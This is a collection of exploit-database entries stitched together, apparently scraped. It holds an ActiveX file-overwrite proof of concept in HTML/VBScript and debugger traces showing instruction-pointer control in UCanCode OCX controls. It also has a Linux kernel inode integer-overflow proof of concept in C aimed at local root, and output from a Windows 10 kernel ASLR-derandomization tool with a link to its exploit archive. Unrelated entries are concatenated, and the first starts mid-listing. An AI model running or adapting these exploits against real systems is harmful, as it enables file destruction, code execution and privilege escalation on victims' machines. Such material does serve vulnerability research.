Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------

3) various Write methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------

PROOF OF CONCEPT:
<html>
 <object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
  <script language = "vbscript">
   test.SaveTemplateToFile buff,C:\Windows\_system.ini
  </script>
</html>

----------------------------------------
----------------------------------------

REMOTE CODE EXECUTION

This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
so here it is the description of just one of it, "AddDWordUserProperty":

CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4  |.  85C0          TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA

----------------------------------------------------------------------

We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI]
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4  |.  85C0          TEST EAX,EAX
...
...

Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)

----------------------------------------
----------------------------------------

BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------
HireHackking 
/*  Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC

  The inode is a data structure in a Unix-style file system which describes a filesystem 
  object such as a file or a directory. Each inode stores the attributes and disk block 
  locations of the object's data. Filesystem object attributes may include metadata, as 
  well as owner and permission data.

  INODE can be overflowed by mapping a single file too many times, allowing for a local 
  user to possibly gain root access.

  Disclaimer:
  This or previous program is for Educational purpose ONLY. Do not  use it without permission. 
  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any 
  damages caused by direct or indirect use of the information or functionality provided 
  by these programs. The author or any Internet provider bears NO responsibility for content 
  or misuse of these programs or any derivatives thereof. By using these programs you accept 
  the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use 
  of these programs is not Todor Donev's responsibility.

  Thanks to Maya Hristova and all friends.

  Suggestions,comments and job offers are welcome!
  
  Copyright 2016 (c) Todor Donev
  Varna, Bulgaria
  todor.donev@gmail.com
  https://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg
  http://pastebin.com/u/hackerscommunity  

*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}
HireHackking 
Complete Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip

Presentation:
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf


I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016

Requirements

Intel Processor (Haswell or newer)
Windows 10 x64
Usage

Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:

C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------

Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------

Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------

Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------

Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
